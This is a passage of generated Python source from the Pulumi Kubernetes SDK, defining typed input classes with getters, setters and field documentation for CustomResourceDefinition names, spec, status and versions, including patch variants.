    def reason(self) -> Optional[pulumi.Input[str]]:
        """Unique one-word CamelCase reason for the last transition."""
        return pulumi.get(self, "reason")

    @reason.setter
    def reason(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reason", value)
@pulumi.input_type
class CustomResourceDefinitionNamesPatchArgs:
    def __init__(__self__, *,
                 categories: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 list_kind: Optional[pulumi.Input[str]] = None,
                 plural: Optional[pulumi.Input[str]] = None,
                 short_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 singular: Optional[pulumi.Input[str]] = None):
        """
        CustomResourceDefinitionNames indicates the names to serve this
        CustomResourceDefinition. Patch variant: every field is optional.

        :param categories: Grouped resources this custom resource belongs to
            (e.g. 'all'), used for invocations like `kubectl get all`.
        :param kind: Serialized kind of the resource; normally CamelCase and
            singular, used as the `kind` attribute in API calls.
        :param list_kind: Serialized kind of the list; defaults to "`kind`List".
        :param plural: Plural resource name, served under
            `/apis/<group>/<version>/.../<plural>`; must be all lowercase and
            match the CRD name (`<names.plural>.<group>`).
        :param short_names: Lowercase short names for `kubectl get <shortname>`.
        :param singular: Lowercase singular name; defaults to lowercased `kind`.
        """
        # Record only the fields the caller actually supplied.
        for key, val in (("categories", categories),
                         ("kind", kind),
                         ("list_kind", list_kind),
                         ("plural", plural),
                         ("short_names", short_names),
                         ("singular", singular)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def categories(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Grouped resources this custom resource belongs to (e.g. 'all')."""
        return pulumi.get(self, "categories")

    @categories.setter
    def categories(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "categories", value)

    @property
    @pulumi.getter
    def kind(self) -> Optional[pulumi.Input[str]]:
        """Serialized kind of the resource (normally CamelCase and singular)."""
        return pulumi.get(self, "kind")

    @kind.setter
    def kind(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kind", value)

    @property
    @pulumi.getter(name="listKind")
    def list_kind(self) -> Optional[pulumi.Input[str]]:
        """Serialized kind of the list; defaults to "`kind`List"."""
        return pulumi.get(self, "list_kind")

    @list_kind.setter
    def list_kind(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "list_kind", value)

    @property
    @pulumi.getter
    def plural(self) -> Optional[pulumi.Input[str]]:
        """Lowercase plural resource name; must match the CRD name prefix."""
        return pulumi.get(self, "plural")

    @plural.setter
    def plural(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "plural", value)

    @property
    @pulumi.getter(name="shortNames")
    def short_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Lowercase short names for invocations like `kubectl get <shortname>`."""
        return pulumi.get(self, "short_names")

    @short_names.setter
    def short_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "short_names", value)

    @property
    @pulumi.getter
    def singular(self) -> Optional[pulumi.Input[str]]:
        """Lowercase singular name; defaults to lowercased `kind`."""
        return pulumi.get(self, "singular")

    @singular.setter
    def singular(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "singular", value)
@pulumi.input_type
class CustomResourceDefinitionNamesArgs:
    def __init__(__self__, *,
                 kind: pulumi.Input[str],
                 plural: pulumi.Input[str],
                 categories: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 list_kind: Optional[pulumi.Input[str]] = None,
                 short_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 singular: Optional[pulumi.Input[str]] = None):
        """
        CustomResourceDefinitionNames indicates the names to serve this
        CustomResourceDefinition.

        :param kind: Serialized kind of the resource; normally CamelCase and
            singular, used as the `kind` attribute in API calls. Required.
        :param plural: Plural resource name, served under
            `/apis/<group>/<version>/.../<plural>`; must be all lowercase and
            match the CRD name (`<names.plural>.<group>`). Required.
        :param categories: Grouped resources this custom resource belongs to
            (e.g. 'all'), used for invocations like `kubectl get all`.
        :param list_kind: Serialized kind of the list; defaults to "`kind`List".
        :param short_names: Lowercase short names for `kubectl get <shortname>`.
        :param singular: Lowercase singular name; defaults to lowercased `kind`.
        """
        # Required fields are always recorded.
        pulumi.set(__self__, "kind", kind)
        pulumi.set(__self__, "plural", plural)
        # Optional fields are recorded only when supplied.
        for key, val in (("categories", categories),
                         ("list_kind", list_kind),
                         ("short_names", short_names),
                         ("singular", singular)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def kind(self) -> pulumi.Input[str]:
        """Serialized kind of the resource (normally CamelCase and singular)."""
        return pulumi.get(self, "kind")

    @kind.setter
    def kind(self, value: pulumi.Input[str]):
        pulumi.set(self, "kind", value)

    @property
    @pulumi.getter
    def plural(self) -> pulumi.Input[str]:
        """Lowercase plural resource name; must match the CRD name prefix."""
        return pulumi.get(self, "plural")

    @plural.setter
    def plural(self, value: pulumi.Input[str]):
        pulumi.set(self, "plural", value)

    @property
    @pulumi.getter
    def categories(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Grouped resources this custom resource belongs to (e.g. 'all')."""
        return pulumi.get(self, "categories")

    @categories.setter
    def categories(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "categories", value)

    @property
    @pulumi.getter(name="listKind")
    def list_kind(self) -> Optional[pulumi.Input[str]]:
        """Serialized kind of the list; defaults to "`kind`List"."""
        return pulumi.get(self, "list_kind")

    @list_kind.setter
    def list_kind(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "list_kind", value)

    @property
    @pulumi.getter(name="shortNames")
    def short_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Lowercase short names for invocations like `kubectl get <shortname>`."""
        return pulumi.get(self, "short_names")

    @short_names.setter
    def short_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "short_names", value)

    @property
    @pulumi.getter
    def singular(self) -> Optional[pulumi.Input[str]]:
        """Lowercase singular name; defaults to lowercased `kind`."""
        return pulumi.get(self, "singular")

    @singular.setter
    def singular(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "singular", value)
@pulumi.input_type
class CustomResourceDefinitionSpecPatchArgs:
    def __init__(__self__, *,
                 conversion: Optional[pulumi.Input['CustomResourceConversionPatchArgs']] = None,
                 group: Optional[pulumi.Input[str]] = None,
                 names: Optional[pulumi.Input['CustomResourceDefinitionNamesPatchArgs']] = None,
                 preserve_unknown_fields: Optional[pulumi.Input[bool]] = None,
                 scope: Optional[pulumi.Input[str]] = None,
                 versions: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionPatchArgs']]]] = None):
        """
        CustomResourceDefinitionSpec describes how a user wants their resource
        to appear. Patch variant: every field is optional.

        :param conversion: Conversion settings for the CRD.
        :param group: API group of the defined custom resource, served under
            `/apis/<group>/...`; must match the CRD name suffix.
        :param names: Resource and kind names for the custom resource.
        :param preserve_unknown_fields: Whether unknown object fields are kept
            when persisting to storage. Deprecated in favor of setting
            `x-preserve-unknown-fields: true` in the per-version OpenAPI schema.
        :param scope: Whether the resource is `Cluster`- or `Namespaced`-scoped.
        :param versions: All API versions of the defined custom resource.
            "Kube-like" version names (v1, v2beta1, ...) sort above other
            strings: GA > beta > alpha, then by major/minor number.
        """
        # Record only the fields the caller actually supplied.
        for key, val in (("conversion", conversion),
                         ("group", group),
                         ("names", names),
                         ("preserve_unknown_fields", preserve_unknown_fields),
                         ("scope", scope),
                         ("versions", versions)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def conversion(self) -> Optional[pulumi.Input['CustomResourceConversionPatchArgs']]:
        """Conversion settings for the CRD."""
        return pulumi.get(self, "conversion")

    @conversion.setter
    def conversion(self, value: Optional[pulumi.Input['CustomResourceConversionPatchArgs']]):
        pulumi.set(self, "conversion", value)

    @property
    @pulumi.getter
    def group(self) -> Optional[pulumi.Input[str]]:
        """API group served under `/apis/<group>/...`; must match the CRD name suffix."""
        return pulumi.get(self, "group")

    @group.setter
    def group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group", value)

    @property
    @pulumi.getter
    def names(self) -> Optional[pulumi.Input['CustomResourceDefinitionNamesPatchArgs']]:
        """Resource and kind names for the custom resource."""
        return pulumi.get(self, "names")

    @names.setter
    def names(self, value: Optional[pulumi.Input['CustomResourceDefinitionNamesPatchArgs']]):
        pulumi.set(self, "names", value)

    @property
    @pulumi.getter(name="preserveUnknownFields")
    def preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
        """Keep unknown object fields when persisting (deprecated; prefer
        `x-preserve-unknown-fields` in the per-version schema)."""
        return pulumi.get(self, "preserve_unknown_fields")

    @preserve_unknown_fields.setter
    def preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "preserve_unknown_fields", value)

    @property
    @pulumi.getter
    def scope(self) -> Optional[pulumi.Input[str]]:
        """Resource scope: `Cluster` or `Namespaced`."""
        return pulumi.get(self, "scope")

    @scope.setter
    def scope(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scope", value)

    @property
    @pulumi.getter
    def versions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionPatchArgs']]]]:
        """All API versions of the custom resource, in "kube-like" sort order."""
        return pulumi.get(self, "versions")

    @versions.setter
    def versions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionPatchArgs']]]]):
        pulumi.set(self, "versions", value)
@pulumi.input_type
class CustomResourceDefinitionSpecArgs:
    """
    Typed input bundle for the ``spec`` of a CustomResourceDefinition.

    Generated Pulumi input type: field values are stored via ``pulumi.set``
    and read back via ``pulumi.get``; each property below corresponds to one
    spec field, with camelCase wire names supplied through
    ``@pulumi.getter(name=...)`` where they differ from snake_case.
    """
    def __init__(__self__, *,
                 group: pulumi.Input[str],
                 names: pulumi.Input['CustomResourceDefinitionNamesArgs'],
                 scope: pulumi.Input[str],
                 versions: pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]],
                 conversion: Optional[pulumi.Input['CustomResourceConversionArgs']] = None,
                 preserve_unknown_fields: Optional[pulumi.Input[bool]] = None):
        """
        CustomResourceDefinitionSpec describes how a user wants their resource to appear
        :param pulumi.Input[str] group: group is the API group of the defined custom resource. The custom resources are served under `/apis/<group>/...`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`).
        :param pulumi.Input['CustomResourceDefinitionNamesArgs'] names: names specify the resource and kind names for the custom resource.
        :param pulumi.Input[str] scope: scope indicates whether the defined custom resource is cluster- or namespace-scoped. Allowed values are `Cluster` and `Namespaced`.
        :param pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]] versions: versions is the list of all API versions of the defined custom resource. Version names are used to compute the order in which served versions are listed in API discovery. If the version string is "kube-like", it will sort above non "kube-like" version strings, which are ordered lexicographically. "Kube-like" versions start with a "v", then are followed by a number (the major version), then optionally the string "alpha" or "beta" and another number (the minor version). These are sorted first by GA > beta > alpha (where GA is a version with no suffix such as beta or alpha), and then by comparing major version, then minor version. An example sorted list of versions: v10, v2, v1, v11beta2, v10beta3, v3beta1, v12alpha1, v11alpha2, foo1, foo10.
        :param pulumi.Input['CustomResourceConversionArgs'] conversion: conversion defines conversion settings for the CRD.
        :param pulumi.Input[bool] preserve_unknown_fields: preserveUnknownFields indicates that object fields which are not specified in the OpenAPI schema should be preserved when persisting to storage. apiVersion, kind, metadata and known fields inside metadata are always preserved. This field is deprecated in favor of setting `x-preserve-unknown-fields` to true in `spec.versions[*].schema.openAPIV3Schema`. See https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#field-pruning for details.
        """
        # Required fields are always stored; optional fields only when supplied.
        pulumi.set(__self__, "group", group)
        pulumi.set(__self__, "names", names)
        pulumi.set(__self__, "scope", scope)
        pulumi.set(__self__, "versions", versions)
        if conversion is not None:
            pulumi.set(__self__, "conversion", conversion)
        if preserve_unknown_fields is not None:
            pulumi.set(__self__, "preserve_unknown_fields", preserve_unknown_fields)
    @property
    @pulumi.getter
    def group(self) -> pulumi.Input[str]:
        """
        group is the API group of the defined custom resource. The custom resources are served under `/apis/<group>/...`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`).
        """
        return pulumi.get(self, "group")
    @group.setter
    def group(self, value: pulumi.Input[str]):
        pulumi.set(self, "group", value)
    @property
    @pulumi.getter
    def names(self) -> pulumi.Input['CustomResourceDefinitionNamesArgs']:
        """
        names specify the resource and kind names for the custom resource.
        """
        return pulumi.get(self, "names")
    @names.setter
    def names(self, value: pulumi.Input['CustomResourceDefinitionNamesArgs']):
        pulumi.set(self, "names", value)
    @property
    @pulumi.getter
    def scope(self) -> pulumi.Input[str]:
        """
        scope indicates whether the defined custom resource is cluster- or namespace-scoped. Allowed values are `Cluster` and `Namespaced`.
        """
        return pulumi.get(self, "scope")
    @scope.setter
    def scope(self, value: pulumi.Input[str]):
        pulumi.set(self, "scope", value)
    @property
    @pulumi.getter
    def versions(self) -> pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]]:
        """
        versions is the list of all API versions of the defined custom resource. Version names are used to compute the order in which served versions are listed in API discovery. If the version string is "kube-like", it will sort above non "kube-like" version strings, which are ordered lexicographically. "Kube-like" versions start with a "v", then are followed by a number (the major version), then optionally the string "alpha" or "beta" and another number (the minor version). These are sorted first by GA > beta > alpha (where GA is a version with no suffix such as beta or alpha), and then by comparing major version, then minor version. An example sorted list of versions: v10, v2, v1, v11beta2, v10beta3, v3beta1, v12alpha1, v11alpha2, foo1, foo10.
        """
        return pulumi.get(self, "versions")
    @versions.setter
    def versions(self, value: pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionArgs']]]):
        pulumi.set(self, "versions", value)
    @property
    @pulumi.getter
    def conversion(self) -> Optional[pulumi.Input['CustomResourceConversionArgs']]:
        """
        conversion defines conversion settings for the CRD.
        """
        return pulumi.get(self, "conversion")
    @conversion.setter
    def conversion(self, value: Optional[pulumi.Input['CustomResourceConversionArgs']]):
        pulumi.set(self, "conversion", value)
    @property
    @pulumi.getter(name="preserveUnknownFields")
    def preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
        """
        preserveUnknownFields indicates that object fields which are not specified in the OpenAPI schema should be preserved when persisting to storage. apiVersion, kind, metadata and known fields inside metadata are always preserved. This field is deprecated in favor of setting `x-preserve-unknown-fields` to true in `spec.versions[*].schema.openAPIV3Schema`. See https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#field-pruning for details.
        """
        return pulumi.get(self, "preserve_unknown_fields")
    @preserve_unknown_fields.setter
    def preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "preserve_unknown_fields", value)
@pulumi.input_type
class CustomResourceDefinitionStatusArgs:
    """
    Typed inputs for the observed status of a CustomResourceDefinition.

    Generated Pulumi input type: values are held via ``pulumi.set`` /
    ``pulumi.get`` under snake_case keys, with camelCase wire names mapped
    through ``@pulumi.getter(name=...)``.
    """
    def __init__(__self__, *,
                 accepted_names: pulumi.Input['CustomResourceDefinitionNamesArgs'],
                 stored_versions: pulumi.Input[Sequence[pulumi.Input[str]]],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]]] = None):
        """
        CustomResourceDefinitionStatus indicates the state of the CustomResourceDefinition
        :param pulumi.Input['CustomResourceDefinitionNamesArgs'] accepted_names: acceptedNames are the names that are actually being used to serve discovery. They may be different than the names in spec.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] stored_versions: storedVersions lists all versions of CustomResources that were ever persisted. Tracking these versions allows a migration path for stored versions in etcd. The field is mutable so a migration controller can finish a migration to another version (ensuring no old objects are left in storage), and then remove the rest of the versions from this list. Versions may not be removed from `spec.versions` while they exist in this list.
        :param pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]] conditions: conditions indicate state for particular aspects of a CustomResourceDefinition
        """
        # The two mandatory inputs are always recorded, in declaration order;
        # the optional one only when the caller actually supplied it.
        for attr_name, attr_value in (("accepted_names", accepted_names),
                                      ("stored_versions", stored_versions)):
            pulumi.set(__self__, attr_name, attr_value)
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)
    @property
    @pulumi.getter(name="acceptedNames")
    def accepted_names(self) -> pulumi.Input['CustomResourceDefinitionNamesArgs']:
        """
        acceptedNames are the names that are actually being used to serve discovery. They may be different than the names in spec.
        """
        return pulumi.get(self, "accepted_names")
    @accepted_names.setter
    def accepted_names(self, value: pulumi.Input['CustomResourceDefinitionNamesArgs']):
        pulumi.set(self, "accepted_names", value)
    @property
    @pulumi.getter(name="storedVersions")
    def stored_versions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        storedVersions lists all versions of CustomResources that were ever persisted. Tracking these versions allows a migration path for stored versions in etcd. The field is mutable so a migration controller can finish a migration to another version (ensuring no old objects are left in storage), and then remove the rest of the versions from this list. Versions may not be removed from `spec.versions` while they exist in this list.
        """
        return pulumi.get(self, "stored_versions")
    @stored_versions.setter
    def stored_versions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "stored_versions", value)
    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]]]:
        """
        conditions indicate state for particular aspects of a CustomResourceDefinition
        """
        return pulumi.get(self, "conditions")
    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class CustomResourceDefinitionVersionPatchArgs:
    """
    Patch-variant input type for one CRD version: every field is optional so
    a patch can carry only the fields being changed. Values are stored via
    ``pulumi.set`` and read back via ``pulumi.get``.
    """
    def __init__(__self__, *,
                 additional_printer_columns: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]]] = None,
                 deprecated: Optional[pulumi.Input[bool]] = None,
                 deprecation_warning: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 schema: Optional[pulumi.Input['CustomResourceValidationPatchArgs']] = None,
                 served: Optional[pulumi.Input[bool]] = None,
                 storage: Optional[pulumi.Input[bool]] = None,
                 subresources: Optional[pulumi.Input['CustomResourceSubresourcesPatchArgs']] = None):
        """
        CustomResourceDefinitionVersion describes a version for CRD.
        :param pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]] additional_printer_columns: additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
        :param pulumi.Input[bool] deprecated: deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
        :param pulumi.Input[str] deprecation_warning: deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
        :param pulumi.Input[str] name: name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
        :param pulumi.Input['CustomResourceValidationPatchArgs'] schema: schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
        :param pulumi.Input[bool] served: served is a flag enabling/disabling this version from being served via REST APIs
        :param pulumi.Input[bool] storage: storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
        :param pulumi.Input['CustomResourceSubresourcesPatchArgs'] subresources: subresources specify what subresources this version of the defined custom resource have.
        """
        # Patch semantics: only fields the caller explicitly supplied are stored.
        if additional_printer_columns is not None:
            pulumi.set(__self__, "additional_printer_columns", additional_printer_columns)
        if deprecated is not None:
            pulumi.set(__self__, "deprecated", deprecated)
        if deprecation_warning is not None:
            pulumi.set(__self__, "deprecation_warning", deprecation_warning)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if schema is not None:
            pulumi.set(__self__, "schema", schema)
        if served is not None:
            pulumi.set(__self__, "served", served)
        if storage is not None:
            pulumi.set(__self__, "storage", storage)
        if subresources is not None:
            pulumi.set(__self__, "subresources", subresources)
    @property
    @pulumi.getter(name="additionalPrinterColumns")
    def additional_printer_columns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]]]:
        """
        additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
        """
        return pulumi.get(self, "additional_printer_columns")
    @additional_printer_columns.setter
    def additional_printer_columns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionPatchArgs']]]]):
        pulumi.set(self, "additional_printer_columns", value)
    @property
    @pulumi.getter
    def deprecated(self) -> Optional[pulumi.Input[bool]]:
        """
        deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
        """
        return pulumi.get(self, "deprecated")
    @deprecated.setter
    def deprecated(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "deprecated", value)
    @property
    @pulumi.getter(name="deprecationWarning")
    def deprecation_warning(self) -> Optional[pulumi.Input[str]]:
        """
        deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
        """
        return pulumi.get(self, "deprecation_warning")
    @deprecation_warning.setter
    def deprecation_warning(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deprecation_warning", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def schema(self) -> Optional[pulumi.Input['CustomResourceValidationPatchArgs']]:
        """
        schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
        """
        return pulumi.get(self, "schema")
    @schema.setter
    def schema(self, value: Optional[pulumi.Input['CustomResourceValidationPatchArgs']]):
        pulumi.set(self, "schema", value)
    @property
    @pulumi.getter
    def served(self) -> Optional[pulumi.Input[bool]]:
        """
        served is a flag enabling/disabling this version from being served via REST APIs
        """
        return pulumi.get(self, "served")
    @served.setter
    def served(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "served", value)
    @property
    @pulumi.getter
    def storage(self) -> Optional[pulumi.Input[bool]]:
        """
        storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
        """
        return pulumi.get(self, "storage")
    @storage.setter
    def storage(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "storage", value)
    @property
    @pulumi.getter
    def subresources(self) -> Optional[pulumi.Input['CustomResourceSubresourcesPatchArgs']]:
        """
        subresources specify what subresources this version of the defined custom resource have.
        """
        return pulumi.get(self, "subresources")
    @subresources.setter
    def subresources(self, value: Optional[pulumi.Input['CustomResourceSubresourcesPatchArgs']]):
        pulumi.set(self, "subresources", value)
@pulumi.input_type
class CustomResourceDefinitionVersionArgs:
    """
    Input type describing one served version of a CRD. ``name``, ``served``
    and ``storage`` are required; the remaining fields are optional. Values
    are stored via ``pulumi.set`` and read back via ``pulumi.get``.
    """
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 served: pulumi.Input[bool],
                 storage: pulumi.Input[bool],
                 additional_printer_columns: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]]] = None,
                 deprecated: Optional[pulumi.Input[bool]] = None,
                 deprecation_warning: Optional[pulumi.Input[str]] = None,
                 schema: Optional[pulumi.Input['CustomResourceValidationArgs']] = None,
                 subresources: Optional[pulumi.Input['CustomResourceSubresourcesArgs']] = None):
        """
        CustomResourceDefinitionVersion describes a version for CRD.
        :param pulumi.Input[str] name: name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
        :param pulumi.Input[bool] served: served is a flag enabling/disabling this version from being served via REST APIs
        :param pulumi.Input[bool] storage: storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
        :param pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]] additional_printer_columns: additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
        :param pulumi.Input[bool] deprecated: deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
        :param pulumi.Input[str] deprecation_warning: deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
        :param pulumi.Input['CustomResourceValidationArgs'] schema: schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
        :param pulumi.Input['CustomResourceSubresourcesArgs'] subresources: subresources specify what subresources this version of the defined custom resource have.
        """
        # Required fields are always stored; optional fields only when supplied.
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "served", served)
        pulumi.set(__self__, "storage", storage)
        if additional_printer_columns is not None:
            pulumi.set(__self__, "additional_printer_columns", additional_printer_columns)
        if deprecated is not None:
            pulumi.set(__self__, "deprecated", deprecated)
        if deprecation_warning is not None:
            pulumi.set(__self__, "deprecation_warning", deprecation_warning)
        if schema is not None:
            pulumi.set(__self__, "schema", schema)
        if subresources is not None:
            pulumi.set(__self__, "subresources", subresources)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        name is the version name, e.g. “v1”, “v2beta1”, etc. The custom resources are served under this version at `/apis/<group>/<version>/...` if `served` is true.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def served(self) -> pulumi.Input[bool]:
        """
        served is a flag enabling/disabling this version from being served via REST APIs
        """
        return pulumi.get(self, "served")
    @served.setter
    def served(self, value: pulumi.Input[bool]):
        pulumi.set(self, "served", value)
    @property
    @pulumi.getter
    def storage(self) -> pulumi.Input[bool]:
        """
        storage indicates this version should be used when persisting custom resources to storage. There must be exactly one version with storage=true.
        """
        return pulumi.get(self, "storage")
    @storage.setter
    def storage(self, value: pulumi.Input[bool]):
        pulumi.set(self, "storage", value)
    @property
    @pulumi.getter(name="additionalPrinterColumns")
    def additional_printer_columns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]]]:
        """
        additionalPrinterColumns specifies additional columns returned in Table output. See https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables for details. If no columns are specified, a single column displaying the age of the custom resource is used.
        """
        return pulumi.get(self, "additional_printer_columns")
    @additional_printer_columns.setter
    def additional_printer_columns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceColumnDefinitionArgs']]]]):
        pulumi.set(self, "additional_printer_columns", value)
    @property
    @pulumi.getter
    def deprecated(self) -> Optional[pulumi.Input[bool]]:
        """
        deprecated indicates this version of the custom resource API is deprecated. When set to true, API requests to this version receive a warning header in the server response. Defaults to false.
        """
        return pulumi.get(self, "deprecated")
    @deprecated.setter
    def deprecated(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "deprecated", value)
    @property
    @pulumi.getter(name="deprecationWarning")
    def deprecation_warning(self) -> Optional[pulumi.Input[str]]:
        """
        deprecationWarning overrides the default warning returned to API clients. May only be set when `deprecated` is true. The default warning indicates this version is deprecated and recommends use of the newest served version of equal or greater stability, if one exists.
        """
        return pulumi.get(self, "deprecation_warning")
    @deprecation_warning.setter
    def deprecation_warning(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deprecation_warning", value)
    @property
    @pulumi.getter
    def schema(self) -> Optional[pulumi.Input['CustomResourceValidationArgs']]:
        """
        schema describes the schema used for validation, pruning, and defaulting of this version of the custom resource.
        """
        return pulumi.get(self, "schema")
    @schema.setter
    def schema(self, value: Optional[pulumi.Input['CustomResourceValidationArgs']]):
        pulumi.set(self, "schema", value)
    @property
    @pulumi.getter
    def subresources(self) -> Optional[pulumi.Input['CustomResourceSubresourcesArgs']]:
        """
        subresources specify what subresources this version of the defined custom resource have.
        """
        return pulumi.get(self, "subresources")
    @subresources.setter
    def subresources(self, value: Optional[pulumi.Input['CustomResourceSubresourcesArgs']]):
        pulumi.set(self, "subresources", value)
@pulumi.input_type
class CustomResourceDefinitionArgs:
    """
    Top-level input type for a CustomResourceDefinition resource. ``spec`` is
    required; ``api_version`` and ``kind`` are pinned to their canonical
    constants when supplied (see the NOTE in ``__init__``).
    """
    def __init__(__self__, *,
                 spec: pulumi.Input['CustomResourceDefinitionSpecArgs'],
                 api_version: Optional[pulumi.Input[str]] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 metadata: Optional[pulumi.Input['_meta.v1.ObjectMetaArgs']] = None,
                 status: Optional[pulumi.Input['CustomResourceDefinitionStatusArgs']] = None):
        """
        CustomResourceDefinition represents a resource that should be exposed on the API server. Its name MUST be in the format <.spec.name>.<.spec.group>.
